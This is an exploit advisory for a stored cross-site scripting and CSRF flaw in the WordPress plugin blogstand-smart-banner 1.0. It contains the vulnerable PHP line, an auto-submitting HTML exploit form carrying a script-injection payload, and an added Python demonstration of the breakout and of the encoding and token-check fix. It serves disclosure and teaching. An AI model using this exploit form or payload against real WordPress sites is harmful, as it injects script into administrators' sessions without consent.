Wordpress blogstand-smart-banner.1.0 Cross Site Scripting

2014.07.02
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################
# Exploit Title : Wordpress blogstand-smart-banner.1.0 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/blogstand-smart-banner/
# Software Link : http://downloads.wordpress.org/plugin/blogstand-smart-banner.1.0.zip
# Date : 2014-07-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wp-admin/options-general.php?page=bs-banner
######################
# Vulnerable code :

<td><input type="text" name="<?php echo $blog_id_field; ?>" value="<?php echo $blog_id; ?>" /></td>

The saved blog-id option is echoed straight into the value attribute of the settings form without attribute encoding (esc_attr() in WordPress), so a stored value containing a double quote closes the attribute and the tag and the rest is rendered as markup. The settings handler also accepts the POST without any anti-CSRF token, so the page below, loaded in the browser of a logged-in administrator, submits the payload on the admin's behalf; the script then executes every time the bs-banner settings page is viewed.

######################
Exploit Code:

<html>
<body>
<form name="form1" method="post" action="http://localhost/wp-admin/options-general.php?page=bs-banner">
<input type="hidden" name="blogstand_hidden" value="SET">
<input type="hidden" name="bs_blog_id" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
</form>
</body>
</html>
#####################
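The following is an added example, not code from the plugin or from the advisory. It reproduces the advisory's template and payload in Python (the plugin itself is PHP) and parses the rendered HTML to show the attribute breakout, then shows the same markup with attribute encoding, which is what esc_attr() does in WordPress. The save handler and its _bs_nonce token are assumed for illustration of the CSRF check (wp_nonce_field()/check_admin_referer() in WordPress); they are not the plugin's code.

```python
"""Attribute-breakout XSS demo for the bs-banner settings page.

Added example (not the plugin's or the advisory's code). The vulnerable
template and the payload are copied from the advisory; the field names
"bs_blog_id" / "blogstand_hidden" are the ones its exploit form posts.
The hardened save handler and its "_bs_nonce" token are assumptions.
"""
import html
import secrets
from html.parser import HTMLParser

# Payload taken verbatim from the advisory's exploit form (bs_blog_id value).
PAYLOAD = '"/><script>alert(1);</script>'


def render_vulnerable(blog_id_field: str, blog_id: str) -> str:
    """Mirrors the plugin's template: the stored option is echoed unescaped."""
    return f'<td><input type="text" name="{blog_id_field}" value="{blog_id}" /></td>'


def render_fixed(blog_id_field: str, blog_id: str) -> str:
    """Same markup with HTML attribute encoding (esc_attr() in WordPress)."""
    return (
        f'<td><input type="text" name="{html.escape(blog_id_field, quote=True)}" '
        f'value="{html.escape(blog_id, quote=True)}" /></td>'
    )


class _TagCollector(HTMLParser):
    """Records every start tag and the decoded value attribute of each <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.input_values: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value") or "")


def parse(markup: str) -> tuple[list[str], list[str]]:
    """Return (start tags seen, decoded <input value=...> attributes)."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.input_values


def handle_settings_post(form: dict, session_token: str) -> tuple[bool, str]:
    """Assumed hardened save handler (not the plugin's code).

    Rejects any submission that does not carry the per-session token, so a
    cross-site form like the advisory's exploit page is dropped before the
    option is written; only then is the value accepted and trimmed.
    """
    supplied = form.get("_bs_nonce", "")
    if not secrets.compare_digest(supplied, session_token):
        return False, "rejected: missing or invalid CSRF token"
    if form.get("blogstand_hidden") != "SET":
        return False, "ignored: not a settings submission"
    return True, form.get("bs_blog_id", "").strip()


def demo() -> dict:
    """Run both renderings on the advisory payload and summarise the result."""
    vuln_tags, _ = parse(render_vulnerable("bs_blog_id", PAYLOAD))
    fixed_tags, fixed_values = parse(render_fixed("bs_blog_id", PAYLOAD))
    return {
        "script_tag_in_vulnerable_page": "script" in vuln_tags,
        "script_tag_in_fixed_page": "script" in fixed_tags,
        "payload_kept_as_plain_value": fixed_values == [PAYLOAD],
    }


if __name__ == "__main__":
    print(render_vulnerable("bs_blog_id", PAYLOAD))
    print(render_fixed("bs_blog_id", PAYLOAD))
    print(demo())
    # Constructed cross-site POST, as the exploit page would send it: no token.
    print(handle_settings_post({"blogstand_hidden": "SET", "bs_blog_id": PAYLOAD}, "s3cret"))
```

The parser sees a live script element only in the unescaped rendering; after encoding, the same string survives intact as the input's value, which is the desired behaviour: the fix is output encoding at the point of echo, not stripping characters from the stored option. The token check is the second half of the fix, since without it the exploit page still lands whatever the plugin accepts in the admin's settings.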
Copyright 2024, cxsecurity.com